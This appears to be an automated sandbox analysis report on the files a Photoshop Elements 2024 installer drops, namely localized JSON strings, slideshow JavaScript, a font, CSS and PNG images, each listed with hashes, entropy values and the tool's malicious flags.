                                                                                                      Preview:{.. "Name": "Esercitazioni di Photoshop Elements",.. "SubTitle": "Iniziate, raccogliete tutto ci. che vi serve e lasciatevi ispirare.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 bit) (versione minima richiesta)",.. "OperatingSystemMac": "Mac OS 10.12 (versione minima richiesta)",.. "Memory": "Sono necessari almeno 4 Gb di RAM per installare l'applicazione",.. "TextSlide1": "Abbina il colore e il tono di un'altra foto o utilizza le preimpostazioni.",.. "TextSlide2": "Crea testo stilizzato in pochi secondi.",.. "TextSlide3": "Crea e condivi i reel di foto in MP4.",.. "TextSlide4": "Fai clic per selezionare un cielo o uno sfondo.",.. "TextSlide5": "Look rinnovato, con modalit. luce e buio.",.. "TextSlide6": "Pi.",.. "TextSlide7": "Pannello Azioni rapide per modifiche con un clic",.. "TextSlide8": "Integrazione con Adobe stock",.. "TextSlide9": "Aggiornamenti Web e per dispositivi mobili ",.. "TextSlide10": "(Beta solo in inglese)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1127
                                                                                                      Entropy (8bit):5.56961836864283
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWOlFK2G5e36asK3lc32QV6XGS8kDqbzEzxQciMCj7EOL0uo8fJNoNYnXe8r:va0h5y65mA2N8hWu5pzxWNYnuo
                                                                                                      MD5:C31570E7CCB0FC3A4236B98ABBD0CC08
                                                                                                      SHA1:33AFEC87102C157C7A7B80D0058F40F591E0BBC3
                                                                                                      SHA-256:E645B23E361162F77EDB93AC9028F094C8CC316B2B9AAB88EA4690D43F554BFE
                                                                                                      SHA-512:6B3A2FF37B7EE09BB5FA55DE7F072647DE4F3A54E003C4D08860AB4335E3E2EBB0AB9D483AA853A77D46B2C65F02FCD7CBB5FD12B98C9A88F976D5E64759C035
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements .......",.. "SubTitle": "........................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (..)",.. "OperatingSystemMac": "Mac OS 10.12 (..)",.. "Memory": "...................... 4GB . RAM ......",.. "TextSlide1": "................................",.. "TextSlide2": "....................",.. "TextSlide3": "MP4 .................",.. "TextSlide4": "1 ....................",.. "TextSlide5": "........................",.. "TextSlide6": "...",.. "TextSlide7": "..............................",.. "TextSlide8": "Adobe Stock
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):551
                                                                                                      Entropy (8bit):5.719924059723855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWzAwv/WgQYATnJPO4T3bu1BJGvdhEU3lcLD9gT6XOqjYkS9OTKHHVy1JZR:ARWswl8nVO+36UFKU3lcLM6XOqkpAU1O
                                                                                                      MD5:079C7C099407A71437825C7DF92A92B1
                                                                                                      SHA1:D8195B86E2FC055F86C6EBDF7BBED07A62157A1C
                                                                                                      SHA-256:7CBC5BC481D33E921C57652DA070E5536A2292169C8C000548BC9F3B5367B9A6
                                                                                                      SHA-512:D7E5FF122D86FDB82A4E939E87F0FFF794010A4C5F79FCE0DC0CCB59E9392B5DA7C52B1B99F2A33FA45998E58936A15B900F4AF385DF9684BC419E626D2634D7
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ...",.. "SubTitle": ".... .. ... ... .....",.. "Operating1xWin": "Windows 7 ... . 1(64..)(.. .. ..)",.. "OperatingSystemMac": "Mac OS 10.12(.. .. ..)",.. "Memory": "....... ..... .. 4GB. RAM. ......",.. "TextSlide1": "._Instantly turn photos into works of art.",.. "TextSlide2": "._Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):950
                                                                                                      Entropy (8bit):4.827268491011639
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:IPwcRWDMH36aw3lcXISxODG87cU8XCDUEHEmtclaRAyJK:IUDw6NpSxqfDHvt6yJK
                                                                                                      MD5:12B2FAAEC8A5524181967996AE808234
                                                                                                      SHA1:45DE57CF1B5C0CD4C7FA4CFF9A2CEF54E3F71B72
                                                                                                      SHA-256:06C55DFBC16F965839945B5EF066FE98F05EC8146D5B317D22C7D83D6976D806
                                                                                                      SHA-512:C04D15AB32E4F0DE73E124E3A9CD10AEE73C132ACEA29AA343A8DAF5A9680A63B8A5675294880A7447269653F6339D9F215CC311755B3045659A165EF4777B75
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Zelfstudies voor Photoshop Elements",.. "SubTitle": "Ga aan de slag met handige tools en laat u inspireren.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bits) (minimaal vereist)",.. "OperatingSystemMac": "Mac OS 10.12 (minimaal vereist)",.. "Memory": "U hebt minimaal 4 GB RAM nodig om de toepassing te installeren",.. "TextSlide1": "Stem kleur en tint af op een andere foto of gebruik voorinstellingen.",.. "TextSlide2": "Maak in een oogwenk gestileerde tekst.",.. "TextSlide3": "Maak en deel MP4-reels met foto's.",.. "TextSlide4": "Selecteer de lucht of achtergrond met ..n klik.",.. "TextSlide5": "Nieuwe, verbeterde look met lichte en donkere modus.",.. "TextSlide6": "Plus",.. "TextSlide7": "Snelle handelingen voor bewerkingen met ..n muisklik",.. "TextSlide8": "Integratie met Adobe Stock",.. "TextSlide9": "Updates voor internet en mobiele apparaten ",.. "TextSlide10": "(B.ta, alleen Engelstalig)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1005
                                                                                                      Entropy (8bit):5.197252482745693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+cRW8l36cr3lctnThcoq19aoy7VyMEnrzyxYqD19t7P6f:GC6WC2zao+VyByYqx9ts
                                                                                                      MD5:A2BC40676845B4DDAFEAAB0523FF3671
                                                                                                      SHA1:AD321F26CEC3D9F2E6812AB525AB62403A145D6E
                                                                                                      SHA-256:55FC0609D045D6691129E51B196C71C3D4D98FC77A4DFE8FC6D62DB75C7B1680
                                                                                                      SHA-512:CD0D8E9374F96FECE5673E7F6D9C259329A991F0CE46C90AFC41A51A937853ABAB71E64AC110FDE3977B7638484E1CC204F08D33A779E067DB637F1B54288EA9
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Samouczki programu Photoshop Elements",.. "SubTitle": "Rozpocznij, poznaj wszystkie podstawy, zainspiruj si..",.. "Operating1xWin": "Windows 7 z dodatkiem Service Pack 1 (64-bitowy) (minimalna wymagana wersja)",.. "OperatingSystemMac": "Mac OS 10.12 (minimalna wymagana wersja)",.. "Memory": "Do instalacji aplikacji wymagane s. co najmniej 4 GB pami.ci RAM.",.. "TextSlide1": "Dopasuj kolor i odcie. zdj.cia lub u.yj ustawie. predefiniowanych.",.. "TextSlide2": "Utw.rz tekst stylizowany w kilka sekund.",.. "TextSlide3": "Tw.rz i udost.pniaj rolki fotograficzne MP4.",.. "TextSlide4": "Kliknij, aby wybra. niebo lub t.o.",.. "TextSlide5": "Nowy, od.wie.ony wygl.d - z trybem jasnym i ciemnym.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel szybkich operacji do b.yskawicznych edycji",.. "TextSlide8": "Integracja z us.ug. Adobe Stock",.. "TextSlide9": "Aktualizacje internetowe i.mobilne ",.. "TextSlide10": "(Wersja Beta tylko w.j.zyku angielskim
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1335
                                                                                                      Entropy (8bit):4.708899028432502
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vNcRW3tDc36llsSeJ3lccSeFJGvlqkEZmAhWaTT13hWaTT12hWaTT1FagiXF:V3R46MdZytqkSW+xW+EW+ZCF
                                                                                                      MD5:C08F7659EFCC7319CEA404C411852D7C
                                                                                                      SHA1:960E5E87D616CE32C02101DD95E31A1B9AA5CA01
                                                                                                      SHA-256:0A2B57E247570FCD544EE2D76BB2520824DA5BEC5CC41C4B4082354A8F67087A
                                                                                                      SHA-512:92CEE63DFF79C0F6875ED2B74328995C8A88F473E1E4A412DEF3EA5F6601B2A5EF424D4D1FA45F0E59083A405771A74C7B282AF6879C12E48F62E6AF4BB19781
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "........... .. Photoshop Elements",.. "SubTitle": ".......... ......, ......... ....., ......... ............",.. "Operating1xWin": "Windows 7 . ....... .......... SP1 (64-.........) (.......... .......... ......)",.. "OperatingSystemMac": "Mac OS 10.12 (.......... .......... ......)",.. "Memory": "... ......... .......... ......... ....... 4... ...",.. "TextSlide1": "..... ........ .......... ........... .......... . .......... GIF-............",.. "TextSlide2": "........... .......... ....... ....... . .......... ........ .......",.. "TextSlide4": "........... .......... ....... ....... . .......... ......
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):966
                                                                                                      Entropy (8bit):5.007707161623855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:UcRWUuN36oJ3l4Kh+sW92zJZ2KAaceGyBL2Jgsmks/NhGQsuUbz9k:wUud6ObhU2zAcGyBOo/NhHsU
                                                                                                      MD5:9A386BDD3D45947475EA973AA97A29FB
                                                                                                      SHA1:F5DA3004442F42B7A59512E35414E6F4758F0634
                                                                                                      SHA-256:7EC82E6599FA6E89DEE2837ECF6544C9062D2133D2D265F181C2710CC22E9129
                                                                                                      SHA-512:796F9078350951EB62CF203E655F9170A1F02DFD9A16E327764955C27437E872E7C2B7612C0817CB4BA52051A0DC4E0B71925DDB0F1E10A81D1E5A41AE645A7B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Sj.lvstudiekurser f.r Photoshop Elements",.. "SubTitle": "Kom ig.ng, l.r dig det grundl.ggande och bli inspirerad.",.. "Operating1xWin": "Windows 7 med Service Pack 1 (64-bitars) kr.vs",.. "OperatingSystemMac": "macOS 10.12 kr.vs",.. "Memory": "Om du vill installera programmet m.ste du ha minst 4 GB med RAM-minne",.. "TextSlide1": "Matcha f.rg och ton fr.n ett annat foto eller anv.nd f.rinst.llningar.",.. "TextSlide2": "Skapa stiliserad text p. n.gra sekunder.",.. "TextSlide3": "Skapa och dela filmrulle i mp4-format.",.. "TextSlide4": "Klicka en g.ng f.r att markera en himmel eller bakgrund.",.. "TextSlide5": "Nytt fr.scht utseende . med ljust och m.rkt l.ge.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panelen Snabb.tg.rder f.r redigeringar med ett klick",.. "TextSlide8": "Adobe Stock-integrering",.. "TextSlide9": "Webb- och mobiluppdateringar ",.. "TextSlide10": "(betaversion endast p. engelska)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):533
                                                                                                      Entropy (8bit):5.952077038813362
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWf0pJ3bu1BJoWhu0mdu3lcW0mdJ3xMIYyeKOTuHHVy1r9R:ARWf2J36aQue3lcW8T1Y1ydv
                                                                                                      MD5:9558152FC5BA73DAE53330E8F74103C3
                                                                                                      SHA1:4583E8593C9BFFE79DB23F204D40F459EE4C579A
                                                                                                      SHA-256:E716DAFAC7426644D61477EF792C1D26FF02E683494E6AE3BBF18FE5672F2409
                                                                                                      SHA-512:A860CFEEFAB7A35CD5B9BA4A9735ECFCD593291D32A846F531AE507A5090DB422F57C4C843341C50D33CC092FDAC8BC1F48ACAF217D400C71440998D2C571581
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ..",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1.64 ........",.. "OperatingSystemMac": "Mac OS 10.12......",.. "Memory": "..... 4GB RAM .........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):535
                                                                                                      Entropy (8bit):5.95952674339767
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWPu5tTJ3bu1BJoWI3lcnqX+M9L5KOTPWHHVy1b9R:ARWPufJ36a33lcqXnP1I1ydv
                                                                                                      MD5:480263433597D1DA400B0CAB80456B3C
                                                                                                      SHA1:B89620BDC7F4C0917EED3CD3D0DE256A8D2AD23B
                                                                                                      SHA-256:DEF0A09F07831DF10E11B346F2130509CB3AB30991C15A7FBDFE3D4AF6889562
                                                                                                      SHA-512:B910FFDFB82C529E6F8E73A389B336117751356273FF4DAC776F456E9298EF72C903A3F39A09EE2F01207FD7860E5BE1BF05AB94843320B51E954589FA524805
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ....",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 ..) (....)",.. "OperatingSystemMac": "Mac OS 10.12 (....)",.. "Memory": "..... 4 GB . RAM ........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):500
                                                                                                      Entropy (8bit):4.923628829725424
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWrsxRrW/c3bu1BJoWF3lcnRFJgjCd2OT+ZHHVy1HNTR:ARW2Rv36a83lcHd5K1yZNl
                                                                                                      MD5:8BE468F56ED75DF9FD6E9296736C7437
                                                                                                      SHA1:6A5387D379E90A41DF202F2186DD520F707C91B4
                                                                                                      SHA-256:AA811CB8BD2936A0B7F3F884E3347D9DBF4663ABFFDAF64401A13F7910C5FF86
                                                                                                      SHA-512:85C55278DBAF490AD4686CEA2D3EDCC54C891654FE16B5129F5D28C20C2AB9D3A6AB98286F93FFA09906E7D74FDA9A1E8357ABE2A9B2643879C5C775D9372510
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements tutorials",.. "SubTitle": "Get started, get the essentials, get inspired.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",.. "TextSlide1": "Instantly turn photos into works of art.",.. "TextSlide2": "Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2787
                                                                                                      Entropy (8bit):5.184018118549148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NrWwZsezuvmwQr3TcEuDgAIKRzpIrspGZXBi0ahMDPTAP96kP9N9P9ciP9aMHLPU:4wZ6pQrRu00lIrW4i0rTMU4LBSS574Es
                                                                                                      MD5:44D3F90C842E5387DD782BC6097FABBD
                                                                                                      SHA1:CB6F6D2D643A5D958BD00D7C212BD35C2BB4DDEB
                                                                                                      SHA-256:DDA5350E57A484A80CA07489F18F064D67E21CCB08B36FF2BFA2C37657D6F37F
                                                                                                      SHA-512:3BB152DA1E07A6A86C375A3790C65C185557F92B0148A0C41CB4E1C5D079C3F9E7EC33F6E08652669AB6BFCDABF61B358FDAA353CCF1BFB0D99E4B8C5F6188C6
                                                                                                      Malicious:false
                                                                                                      Preview:$(document).ready(function() { cecInit(); });....function cecInit() {.. var jsonData;.. var locale = getParameterByName("locale");.. var isHighDpi = getParameterByName("isHighDpi");.... $("html").attr("lang", locale.slice(0, 2));.... cecGetLocaleJson(locale);..}....function resizeWin() { myWindow.resizeTo(455, 239); }..var slideIndex = 0;..showSlides();....function showSlides() {.. var i;.. var slides = document.getElementsByClassName("mySlides");.. for (i = 0; i < slides.length; i++) {.. slides[i].style.opacity = "0";.. slides[i].style.visibility = "hidden";.. }.. slideIndex++;.. if (slideIndex > slides.length) {.. slideIndex = 1;.. }.... slides[slideIndex - 1].style.opacity = "1";.. slides[slideIndex - 1].style.visibility = "visible";.... if (slideIndex == 6) {.. slideIndex = 0;.. }.. setTimeout(showSlides, 6000); // Change image every 5 seconds..}....function getParameterByName(name) {.. name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");.. var
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 31112, version 1.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):31112
                                                                                                      Entropy (8bit):7.984152889259412
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:4ol18SuOO3bBAughXjNPQsXVjWuu7jqWdTS2gS:Lr6tAugVjN4sXJYjqWdm2V
                                                                                                      MD5:6AF297E58EDC414EE90C76C2D3EA8678
                                                                                                      SHA1:7497D181CD6FE3A4B01A4F8B6BA6A47D3FA54333
                                                                                                      SHA-256:3E8F59DB6DFAE287AF8DCCC0FDF5E15A8AA2A954C2C232BC6C64536E1A27EAA5
                                                                                                      SHA-512:61E14F8E605C4D2B52C9A874F40E73FDE43625BC468BA3C7316E7672CFFD05B7C1766C875FC1B48218BD2B6856226645EE9BCB45810EB7121C5DBD0C184B7D0A
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF......y................................BASE.......J....c`[.FFTM............[...GDEF.......#...&....OS/2.......X...`j..#cmap...d.........B.cvt .......V...V.}..fpgm...@.......e../.gasp................glyf......k4.....8.head..q4...2...6..Cohhea..qh... ...$.r.hhmtx..q....Y.....6P.loca..s..........c..maxp..u.... ... ....name..u....(...2.JI.post..v..........k.prep..x.........:.&cx.c`d``..b..>........<...7............l....<...6..`d`...a`....d...z.....x.c```d....6...'{..@.J.b%...x.c`d``..b9..`.BF..@...%....c..+O...x.c`a~.8.......,...,..t.!.).Hs.23..01.$00..............o....w00..d.P``...c......\..y..x.c```f.`..F..8..1..,..........P..1............).9.%.5.}.+.x.5.J..~........1...AA@ABA.............._..........p.......~.......4?0..H.).S.....l.p.L@..]..,.l...\.<.|...B.".b...R.2.r...J.*.j...Z.:.z...F.&.f...V.6.v...N...n...^.>.~...A.!.a...Q.1.q....m..g.[.h...W.^.f..u.6n.e..{v...P...y.baA...,..Y......`...0.....b...Kjj.~...k.n_..........>{.Py..CKOsoW...}S.1L.3w6..c.@MU@.../.>...
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):189
                                                                                                      Entropy (8bit):4.841995719284234
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:5RFKqvZKSYRvsDQR7C8jOIbQvLwKEUc3XKRCRNKLUDfFLKYgEQmXt:PJ9MsfIsvMfHHKRkNlZLKYgE7t
                                                                                                      MD5:3A0EC2D2C5020A3CF45C13A87434B285
                                                                                                      SHA1:12275D4D51DE801CE28C88A0C246DE22C6D08120
                                                                                                      SHA-256:406288E48CED388744E5165A1EC4266F419CC409E4A70036E4B15A93AF5C42AB
                                                                                                      SHA-512:A7C6D55F64D91E5D71661E040F4D06D2C873E0B2D2A3B2E52FF60D230A7C7C0924CD0DDC4DC124D53736C934023A27D6ED77C1266732F0B5DE5DC75B02715C8B
                                                                                                      Malicious:false
                                                                                                      Preview:@charset "utf-8";..@font-face {...font-family: 'AdobeClean';...src: url('fonts/adobeclean/adobeclean-regular-webfont.woff') format('woff');...font-weight: normal;...font-style: normal;..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):218501
                                                                                                      Entropy (8bit):7.994177806609243
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:IF6yyknzdRSTey+E4xlziCaENqYYRPuL1hGQ/uve:q6dkzdRzyfUlOZENXYJ2jGve
                                                                                                      MD5:70155993A908DD3F179030722111DAFD
                                                                                                      SHA1:7F77A6DA3295559977185127DF0131DFEAAB6401
                                                                                                      SHA-256:CE3DB74C58B62C946144D90E1B98982846BFDBA928F3832EFF5DFB0800BD14DD
                                                                                                      SHA-512:F4F84A88984EA656A13AD7D2F171688910528692E4CDEA2128C01EAAEE1E342AED9CD381162B888634083B38B36D34EEA31AF05E8BA0790570FB26125E6926EE
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:43-07:00" xmp:MetadataDate="2023-06-08T09:43:43-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9cd1a8a5-fa0f-4664-954e-671adbe841c1" xmpMM:DocumentID="adobe:docid:photoshop:33d3baaf-635d-744b-8709-2bf9163d9686" xmpMM:OriginalDocumentID="xmp.did:f
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196538
                                                                                                      Entropy (8bit):7.994396839674714
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CnSlcookIH/9pdgUmvcFsGE4WywNB2DuN/7/r+Hh44JJwN+xMAr/Goh2qMdi3Add:EDo3ctFsR/Ht7KBRTiAr/GDVH7qfpgJb
                                                                                                      MD5:ECBDD07F272A819936179371478A8C3F
                                                                                                      SHA1:FF77202067ACB0463E7878C44004CF55549325C1
                                                                                                      SHA-256:D370C16BDA414ECEED68A3432A1C2EBD37E3E84151E667CA5FCC2DA1A6876305
                                                                                                      SHA-512:1B9FBD76C08CDAD927583F80FE5854EBFF55741805ADE093071A4BEEF0887DEF2CB456AD1B996CE110DD45F9E1B329457833BFF4DA0D391E0E7770D0FF119D21
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:26-07:00" xmp:ModifyDate="2023-06-08T09:43:44-07:00" xmp:MetadataDate="2023-06-08T09:43:44-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:4879ee18-af3c-48f2-a799-f0d2eb0add0b" xmpMM:DocumentID="adobe:docid:photoshop:63b35f9e-9203-bb4d-9b26-ed4aa5736dba" xmpMM:OriginalDocumentID="xmp.did:e
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):149774
                                                                                                      Entropy (8bit):7.991574130023794
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:55ne4y2rhCF9yOm7QMflNGiYb+s9N5FsUA5FLOI70degQa:Pn3rkF27Q6Sbp0PLOI7GR
                                                                                                      MD5:6FC7D9D817DECC0ECA1F54C1540DA1A0
                                                                                                      SHA1:01959A4664CF3EA64A9CC85E6F8F60B25698107B
                                                                                                      SHA-256:9426BB5B0A9E4524C05C861781A8599646B83B0572F548A065C0EC6B791B016D
                                                                                                      SHA-512:1C492B0926915206A4A233FC1F00F3A5DF21AF7C957F00573BC7780E42A3AFAA444002B9420C31A6AC65C89B4B72DD26E6F640302F8C8240592AB5CA3636FC39
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:45-07:00" xmp:MetadataDate="2023-06-08T09:43:45-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:ecb4903c-3b3e-489c-8b36-4bd9573232de" xmpMM:DocumentID="adobe:docid:photoshop:32c69ae6-f6d6-d24d-96bd-887f72b4446c" xmpMM:OriginalDocumentID="xmp.did:5
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):190441
                                                                                                      Entropy (8bit):7.9969327976436695
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:/FkChxBSQXzJ6QT8bCMw8zYi2qgI4rD/lkX4uVToHq2H263TtV+kPbhKztvyKCy:9kCnBS4zaZdbfX4POX4u1oHqgLP+kPOp
                                                                                                      MD5:448941A2F024056569EF9817EEFEB9A7
                                                                                                      SHA1:544EC13242A4B9BD3E0A4D65079C55DF006D6D24
                                                                                                      SHA-256:21EFD9F1038B0D96E1D14A54E2A57F0EA407149F4C522CF23B617932F7336743
                                                                                                      SHA-512:1CE6C24D06CA13F200C7F856887F644C61AFC2DFD5C25C35197002DF4CD519A7EB98C253A6DCFC05017CD60A7DFFBFD4489DC8C068F6E4638BE546B7BEC0BB62
                                                                                                      Malicious:true
